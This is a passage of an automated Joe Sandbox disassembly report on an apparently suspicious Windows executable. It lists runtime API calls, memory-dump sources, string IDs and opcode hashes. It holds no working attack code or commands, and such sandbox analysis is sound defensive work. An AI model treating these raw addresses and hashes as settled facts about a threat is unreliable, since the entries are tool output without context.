                      • Part of subcall function 0043ADF5: GetLastError.KERNEL32(?,?,0043F0CD,?,00000000,?,?,?,0043F0F4,?,00000007,?,?,0043F4F6,?,?), ref: 0043AE1D
                    • _free.LIBCMT ref: 00442916
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapInformationLastTimeZone
                    • String ID: XgE
                    • API String ID: 2155170405-2984570469
                    • Opcode ID: 408f858600a1f53604d9e13eb6c4a6de5f766e6ad14c8f26f7ae90bdf88e241d
                    • Instruction ID: 8084bd392b0667b16f992d69d3ac30f533f8d402883a3cc5e9c46bc507ca970f
                    • Opcode Fuzzy Hash: 408f858600a1f53604d9e13eb6c4a6de5f766e6ad14c8f26f7ae90bdf88e241d
                    • Instruction Fuzzy Hash: 3B5117B1900215ABFB10EF65CE819AEB7B8EF44314F51026BF510E3291EBF89E418B59
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: C:\Users\user\Desktop\yjzllYsjlU.exe$h'Q
                    • API String ID: 0-874672178
                    • Opcode ID: 7990cc60f13bbf5db04e74938bd2c0700eb67712c1365d603b23e261442dbb4b
                    • Instruction ID: 5a6a14289eafe60ce2143b443f35f28c3b9330844cb9aa4b0d6a2bcf37f19cd6
                    • Opcode Fuzzy Hash: 7990cc60f13bbf5db04e74938bd2c0700eb67712c1365d603b23e261442dbb4b
                    • Instruction Fuzzy Hash: B841A571A00219AFDB159F9ACC859AFBBF8EB8D310F10106BE404A7351E7F48E41CB59
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: C:\Users\user\Desktop\yjzllYsjlU.exe$h'Q
                    • API String ID: 0-874672178
                    • Opcode ID: 7990cc60f13bbf5db04e74938bd2c0700eb67712c1365d603b23e261442dbb4b
                    • Instruction ID: 954ae4dd0bd70516f101dea8671ffa80ac83a04ab8077b01b53472b2347d404c
                    • Opcode Fuzzy Hash: 7990cc60f13bbf5db04e74938bd2c0700eb67712c1365d603b23e261442dbb4b
                    • Instruction Fuzzy Hash: E3417571E40614AFCB27DBA9DC809EFBBB9EF85310F140066E605D72A0D7B08A42CF55
                    APIs
                    • ___except_validate_context_record.LIBVCRUNTIME ref: 021B4AE6
                    • __IsNonwritableInCurrentImage.LIBCMT ref: 021B4B9A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: CurrentImageNonwritable___except_validate_context_record
                    • String ID: S9C$csm
                    • API String ID: 3480331319-582408667
                    • Opcode ID: a4331c987b1b53513cbe21c672c92ef55e4810aa54a37fe5f5d469cf9e84ef45
                    • Instruction ID: bacd46f9bc503810f51186be001968dcf51279cca9d56df6d93133a6097813fb
                    • Opcode Fuzzy Hash: a4331c987b1b53513cbe21c672c92ef55e4810aa54a37fe5f5d469cf9e84ef45
                    • Instruction Fuzzy Hash: 6C41B238A40218AFCF21DF68C994BDEBBB5AF45318F14C195E9149B392D771EA01CF90
                    APIs
                    • RtlEncodePointer.NTDLL(00000000), ref: 00435680
                    • CatchIt.LIBVCRUNTIME ref: 00435766
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: CatchEncodePointer
                    • String ID: MOC$RCC
                    • API String ID: 1435073870-2084237596
                    • Opcode ID: e76bbd798ac2a2531b018cbcd065df587f22d77e50faeab241abe2fb58f9e970
                    • Instruction ID: 5e74a0003837bbbf1c0f5d1cc79d9a8e9fb2d82c4166bdd95ad30412f998441c
                    • Opcode Fuzzy Hash: e76bbd798ac2a2531b018cbcd065df587f22d77e50faeab241abe2fb58f9e970
                    • Instruction Fuzzy Hash: 4A418871900609EFCF15CF98DC82AEEBBB5BF4C304F18909AF90867221D339A950DB58
                    APIs
                    • RtlEncodePointer.NTDLL(00000000), ref: 021B58E7
                    • CatchIt.LIBVCRUNTIME ref: 021B59CD
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: CatchEncodePointer
                    • String ID: MOC$RCC
                    • API String ID: 1435073870-2084237596
                    • Opcode ID: e76bbd798ac2a2531b018cbcd065df587f22d77e50faeab241abe2fb58f9e970
                    • Instruction ID: 9d6b569f54ac7cad38ce9fa5c323b821570cfdd521938477109aad1a8268bcd6
                    • Opcode Fuzzy Hash: e76bbd798ac2a2531b018cbcd065df587f22d77e50faeab241abe2fb58f9e970
                    • Instruction Fuzzy Hash: A7415672940209BFCF16DF98CC81AEEBBB6BF08314F548099F914A7261D3359950DF51
                    APIs
                      • Part of subcall function 0043E259: GetOEMCP.KERNEL32(00000000,0043E4CB,?,?,avC,00437661,?), ref: 0043E284
                    • _free.LIBCMT ref: 0043E528
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free
                    • String ID: @"F$avC
                    • API String ID: 269201875-3024483575
                    • Opcode ID: 9908dd6ab1a80c5fc09db8b12665e78ab5e05ea3aa24e2a155a3ad1beaefeb8c
                    • Instruction ID: c2258c4a8f5ad0cbd888ce205a5b2d9973e5ee0a434949fbdbaf9cd53865a0ee
                    • Opcode Fuzzy Hash: 9908dd6ab1a80c5fc09db8b12665e78ab5e05ea3aa24e2a155a3ad1beaefeb8c
                    • Instruction Fuzzy Hash: 5131BE71800249AFDB01DFAAD841B9F7BF5EF48318F1010AAF8109B2A2EB79DD50CB55
                    APIs
                    • List.LIBCONCRT ref: 0042AEEA
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042AF0F
                    • Concurrency::details::FreeVirtualProcessorRoot::FreeVirtualProcessorRoot.LIBCONCRT ref: 0042AF4E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: FreeProcessorVirtual$Concurrency::details::ListRootRoot::std::invalid_argument::invalid_argument
                    • String ID: pExecutionResource
                    • API String ID: 1772865662-359481074
                    • Opcode ID: 307fc8553255622f2e41d21d5ca305974523e3bf95507b50fe7deae7cab19e1c
                    • Instruction ID: fa6d3a0e3725f8ef027d180f71de552ac3c936f12b730e52bc2201ef4983df17
                    • Opcode Fuzzy Hash: 307fc8553255622f2e41d21d5ca305974523e3bf95507b50fe7deae7cab19e1c
                    • Instruction Fuzzy Hash: 9A21A9B5B403059BCB04EF55C882BED77A5BF48314F50405FE90167382DB78AE55CB99
                    APIs
                    • _free.LIBCMT ref: 021C2B27
                    • _free.LIBCMT ref: 021C2B7D
                      • Part of subcall function 021C2959: _free.LIBCMT ref: 021C29B1
                      • Part of subcall function 021C2959: GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00456758), ref: 021C29C3
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$InformationTimeZone
                    • String ID: XgE
                    • API String ID: 597776487-2984570469
                    • Opcode ID: f87cbb37d26a9294995cc9def7b394ab45dcd78de0b256dadcc3d82326988738
                    • Instruction ID: 81a873e3390a18cf57a7611747bb6079c94d727cc85e321a2bd354fb1a086b34
                    • Opcode Fuzzy Hash: f87cbb37d26a9294995cc9def7b394ab45dcd78de0b256dadcc3d82326988738
                    • Instruction Fuzzy Hash: 8A2181358402146BC7356B744D80FEA777DDFA4754F3103ADDDA4A3090EBB05D85CAA1
                    APIs
                    • __EH_prolog3.LIBCMT ref: 021A0F31
                    • Concurrency::details::_NonReentrantLock::_Acquire.LIBCONCRT ref: 021A0F3E
                    • Concurrency::details::ResourceManager::ResourceManager.LIBCONCRT ref: 021A0F91
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: Resource$AcquireConcurrency::details::Concurrency::details::_H_prolog3Lock::_ManagerManager::Reentrant
                    • String ID: p[F
                    • API String ID: 220083066-1832964472
                    • Opcode ID: 6216d83329a3209df67438af02903c6e9b09d36f54debea953983a2b7a8ea068
                    • Instruction ID: dfa92f35528e9ff5cb9f8f6e911e340998826222fcfddd5a1d688c30463b86f2
                    • Opcode Fuzzy Hash: 6216d83329a3209df67438af02903c6e9b09d36f54debea953983a2b7a8ea068
                    • Instruction Fuzzy Hash: A501B1389893018FDF15BFB8652036D7AE1AB0D740F50046FE009FB281DB748A008B9A
                    APIs
                    • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0042A102
                    • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0042A126
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042A139
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: Resource$Concurrency::details::Execution$CurrentManager::Proxy::RemoveSchedulerThreadstd::invalid_argument::invalid_argument
                    • String ID: pScheduler
                    • API String ID: 246774199-923244539
                    • Opcode ID: 682a3eefa47bedf4d22a1faa156ea6bcc2a49e045c4e2ce76e6417afd79e9783
                    • Instruction ID: 10cbf4c553f32a99b29d21dedcc7eb1d51cf5285ac80ee2cb09dfeade9188058
                    • Opcode Fuzzy Hash: 682a3eefa47bedf4d22a1faa156ea6bcc2a49e045c4e2ce76e6417afd79e9783
                    • Instruction Fuzzy Hash: 56F02B35700224A38720FA55FC428AEF3789F80729BA0812FEC0517182DB7CAA19C69E
                    APIs
                    • RegisterWaitForSingleObject.KERNEL32(?,?,00000001,%C,000000FF,0000000C), ref: 0041FE31
                    • GetLastError.KERNEL32(?,00430A25,?,00430925,?,?,?,?,?,?,00425CAE,?), ref: 0041FE40
                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041FE56
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorLastObjectRegisterSingleWait
                    • String ID: %C
                    • API String ID: 2296417588-3573392825
                    • Opcode ID: fbcf708f24b496e530a1d5d1bc838a4ad30d765a2443b3a5aa298535997dd61c
                    • Instruction ID: 9d603aad05ffa4e056fd93621e3d7a672a7e3166deae781ad298c0678da8b19d
                    • Opcode Fuzzy Hash: fbcf708f24b496e530a1d5d1bc838a4ad30d765a2443b3a5aa298535997dd61c
                    • Instruction Fuzzy Hash: BFF0A73550020AB7CF00EFA1DC45EEF7B6C6B00705F100525B614E11E2DA38E6449768
                    APIs
                    • RegisterWaitForSingleObject.KERNEL32(?,%C,?,021B0C8C,000000FF,0000000C), ref: 021A0098
                    • GetLastError.KERNEL32(?,021B0C8C,?,00430925,?,?,?,?,?,?,021A5F15,?), ref: 021A00A7
                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 021A00BD
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorLastObjectRegisterSingleWait
                    • String ID: %C
                    • API String ID: 2296417588-4291884666
                    • Opcode ID: fbcf708f24b496e530a1d5d1bc838a4ad30d765a2443b3a5aa298535997dd61c
                    • Instruction ID: 40f979d76903c4dbd54e870fe524ee3abcd2010a1adce197ee83d344c2bbf87a
                    • Opcode Fuzzy Hash: fbcf708f24b496e530a1d5d1bc838a4ad30d765a2443b3a5aa298535997dd61c
                    • Instruction Fuzzy Hash: 7DF0A03954020AFBCF00EFA5DD45FAE3B7DAB04705F200624B520E20D1EB35D6049B64
                    APIs
                    • RtlLeaveCriticalSection.NTDLL(00465750), ref: 0219D42D
                    • WaitForSingleObjectEx.KERNEL32(00468680,00000000,?,0219D39D,00000064,?,0045007C,?,02187854,00468680), ref: 0219D43E
                    • RtlEnterCriticalSection.NTDLL(00465750), ref: 0219D445
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: CriticalSection$EnterLeaveObjectSingleWait
                    • String ID: PWF
                    • API String ID: 501323975-4189640852
                    • Opcode ID: 797b37c2cabad88e9ba561759b38bac6fac545db67df0b7ba0c67b1f35825c1a
                    • Instruction ID: e266dd980f48c7036272fb964834e07f20489835dff8811479552e507b3e19b4
                    • Opcode Fuzzy Hash: 797b37c2cabad88e9ba561759b38bac6fac545db67df0b7ba0c67b1f35825c1a
                    • Instruction Fuzzy Hash: E3E01239541B24F7CB022B50EC09A9E3F68EB46B53F044031FA05665619B656C50CBDF
                    APIs
                    • GetVersionExW.KERNEL32(0000011C,00462014), ref: 02188011
                    • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02188072
                    • GetProcAddress.KERNEL32(00000000), ref: 02188079
                    • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0218813E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressHandleInfoModuleProcSystemVersion
                    • String ID:
                    • API String ID: 1456109104-0
                    • Opcode ID: f86739a690633f7d14615720dab4f5b7d6e0e144a36365c4640fb5ca6efcc30f
                    • Instruction ID: 60f06b2b05b05cc4e9f97845dc42096ea1f17e2b0ae86d5f1a61f0e29bc52d83
                    • Opcode Fuzzy Hash: f86739a690633f7d14615720dab4f5b7d6e0e144a36365c4640fb5ca6efcc30f
                    • Instruction Fuzzy Hash: 35E1F4B1E40258ABDB14BB28CDC679DBA73AB82720F950298D415673C1EB754E85CF83
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: _strrchr
                    • String ID:
                    • API String ID: 3213747228-0
                    • Opcode ID: d1e2580fea8bb5659ef3a0ec9f2bd8d3f247a712cc4476731abb6eb94a7ef4ee
                    • Instruction ID: 19bc3651bf35be7da6878e99f66a07860847112b6dbab7597011fdbed07809a9
                    • Opcode Fuzzy Hash: d1e2580fea8bb5659ef3a0ec9f2bd8d3f247a712cc4476731abb6eb94a7ef4ee
                    • Instruction Fuzzy Hash: 42B139329402859FDB1BCF28D890BFEBBF6EF55340F2581AAD8559B241D7358902CFA0
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: AdjustPointer
                    • String ID:
                    • API String ID: 1740715915-0
                    • Opcode ID: 24256a6a0eee4dc051d6a34bfd34133c294509d047b55e93e8e20eb2f16a28ea
                    • Instruction ID: de7e3e00fb04a34b96eeb7253be455e546d1f1f5c91bb76df3f696651397a324
                    • Opcode Fuzzy Hash: 24256a6a0eee4dc051d6a34bfd34133c294509d047b55e93e8e20eb2f16a28ea
                    • Instruction Fuzzy Hash: 5851E171A01A06AFEF289F55D841BBB73B4EF18304F14516FE80197291E739ED41CB99
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: AdjustPointer
                    • String ID:
                    • API String ID: 1740715915-0
                    • Opcode ID: ee1216290e05d5aa883e1d856bebe084c5c42d67d7e9ed6b593ecc55b417bb7c
                    • Instruction ID: 7b50ec32b65368952d571d0d0272b9b42ae356b5b1f01415727f0cf8aa6b714e
                    • Opcode Fuzzy Hash: ee1216290e05d5aa883e1d856bebe084c5c42d67d7e9ed6b593ecc55b417bb7c
                    • Instruction Fuzzy Hash: AB51D472681705FFEB2A8F50D880BEA77B6EF04305F94456DEC16572A0E7B1E850DB50
                    APIs
                    • GetVersionExW.KERNEL32(0000011C,?,900B88F7), ref: 004083F9
                    • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408460
                    • GetProcAddress.KERNEL32(00000000), ref: 00408467
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressHandleModuleProcVersion
                    • String ID:
                    • API String ID: 3310240892-0
                    • Opcode ID: c5af24d2983aef2b3c383eb558275b6883f436ff97da18ae2b794e3607aa909b
                    • Instruction ID: 938ad35630e66277154cddf74743d86f98c067e6d70a9bb90e20810804f89ef8
                    • Opcode Fuzzy Hash: c5af24d2983aef2b3c383eb558275b6883f436ff97da18ae2b794e3607aa909b
                    • Instruction Fuzzy Hash: E9510870D00214ABDB14EF68DE497DEBB74EB46314F5042BEE445A72C1EF389AC48B99
                    APIs
                    • GetVersionExW.KERNEL32(0000011C,?,00462014), ref: 02188660
                    • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 021886C7
                    • GetProcAddress.KERNEL32(00000000), ref: 021886CE
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressHandleModuleProcVersion
                    • String ID:
                    • API String ID: 3310240892-0
                    • Opcode ID: a9352ec7e219f5b0e6875a96d9916c0a74e731d0ff9642be5bb7f7817e9f41d6
                    • Instruction ID: cfca312a0ae6f2353fa17a4d39fdc90e8105b01ff4e7c394d25ddf276386f607
                    • Opcode Fuzzy Hash: a9352ec7e219f5b0e6875a96d9916c0a74e731d0ff9642be5bb7f7817e9f41d6
                    • Instruction Fuzzy Hash: 4C51F471D402089BEB28EB64DD887DDB776EF45310F9042A8E414A73C0EB359A848F91
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: EqualOffsetTypeids
                    • String ID:
                    • API String ID: 1707706676-0
                    • Opcode ID: f8ad74cfaf4da85e0defff2bffeebfbe5beaccf25cb2e0bdfe85511ce37fdb4b
                    • Instruction ID: cef6b095d55e150eee694991f596d606281b118854b35fc2e5d75d5fbf24ef20
                    • Opcode Fuzzy Hash: f8ad74cfaf4da85e0defff2bffeebfbe5beaccf25cb2e0bdfe85511ce37fdb4b
                    • Instruction Fuzzy Hash: C851BC35A042099FDF10CFA8C4806EEBBF4EF89354F14649BE850A7361D33ABA05CB54
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: EqualOffsetTypeids
                    • String ID:
                    • API String ID: 1707706676-0
                    • Opcode ID: f8ad74cfaf4da85e0defff2bffeebfbe5beaccf25cb2e0bdfe85511ce37fdb4b
                    • Instruction ID: fcab85f9393f134aee3c44e13c74da03da599cc2591004f6d3fd10a88ce3c310
                    • Opcode Fuzzy Hash: f8ad74cfaf4da85e0defff2bffeebfbe5beaccf25cb2e0bdfe85511ce37fdb4b
                    • Instruction Fuzzy Hash: 52517F3994420A9FDF12CF6CC4A4AEEFBF5EF05214F15849EE861A7352D732A944CB90
                    APIs
                    • __Mtx_unlock.LIBCPMT ref: 00402F5F
                    • GetCurrentThreadId.KERNEL32 ref: 00402F7E
                    • __Mtx_unlock.LIBCPMT ref: 00402FCC
                    • __Cnd_broadcast.LIBCPMT ref: 00402FE3
                      • Part of subcall function 0041C6AC: mtx_do_lock.LIBCPMT ref: 0041C6B4
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: Mtx_unlock$Cnd_broadcastCurrentThreadmtx_do_lock
                    • String ID:
                    • API String ID: 3471820992-0
                    • Opcode ID: f0f8b121aba1122f24a75a8c83bd5bf134d72cfcefe3452c2b67ebb99ce96ba3
                    • Instruction ID: 48187f3e1bc168490bb81d7fc303c9f02b2004bad0fbdb5a3eb1e4516cac7e92
                    • Opcode Fuzzy Hash: f0f8b121aba1122f24a75a8c83bd5bf134d72cfcefe3452c2b67ebb99ce96ba3
                    • Instruction Fuzzy Hash: 2141CFB0A016159BDB20DF65C98579BB7E8FF14364F00453EE816E7380EB79EA04CB85
                    APIs
                    • _free.LIBCMT ref: 0044609E
                    • _free.LIBCMT ref: 004460C7
                    • SetEndOfFile.KERNEL32(00000000,00441A0A,00000000,0043AC92,?,?,?,?,?,?,?,00441A0A,0043AC92,00000000), ref: 004460F9
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,00441A0A,0043AC92,00000000,?,?,?,?,00000000), ref: 00446115
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFileLast
                    • String ID:
                    • API String ID: 1547350101-0
                    • Opcode ID: 6fb0f9e19d4acd712ab8c7b746a97e06f48a18ddc77e8d7a73dfb4aa9b2b61d0
                    • Instruction ID: f61cd90cd7361cc84673696b1269d2078ce9a605f9326b768ff18fa508e212cc
                    • Opcode Fuzzy Hash: 6fb0f9e19d4acd712ab8c7b746a97e06f48a18ddc77e8d7a73dfb4aa9b2b61d0
                    • Instruction Fuzzy Hash: 6041F872900601ABFB25ABA9CD02B9E37B5EF4A364F15011BF914E7292D63CD841472A
                    APIs
                    • _free.LIBCMT ref: 021C6305
                    • _free.LIBCMT ref: 021C632E
                    • SetEndOfFile.KERNEL32(00000000,021C1C71,00000000,021BAEF9,?,?,?,?,?,?,?,021C1C71,021BAEF9,00000000), ref: 021C6360
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,021C1C71,021BAEF9,00000000,?,?,?,?,00000000), ref: 021C637C
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFileLast
                    • String ID:
                    • API String ID: 1547350101-0
                    • Opcode ID: 6fb0f9e19d4acd712ab8c7b746a97e06f48a18ddc77e8d7a73dfb4aa9b2b61d0
                    • Instruction ID: a20ba554a243e471dee15bba1b891c95933ac050b02a87dbeff577f1663e8599
                    • Opcode Fuzzy Hash: 6fb0f9e19d4acd712ab8c7b746a97e06f48a18ddc77e8d7a73dfb4aa9b2b61d0
                    • Instruction Fuzzy Hash: 0B41C83A9806859FDB126BB8CC40BDE77BEAFE5360F341529E838A7194E734C445CB61
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
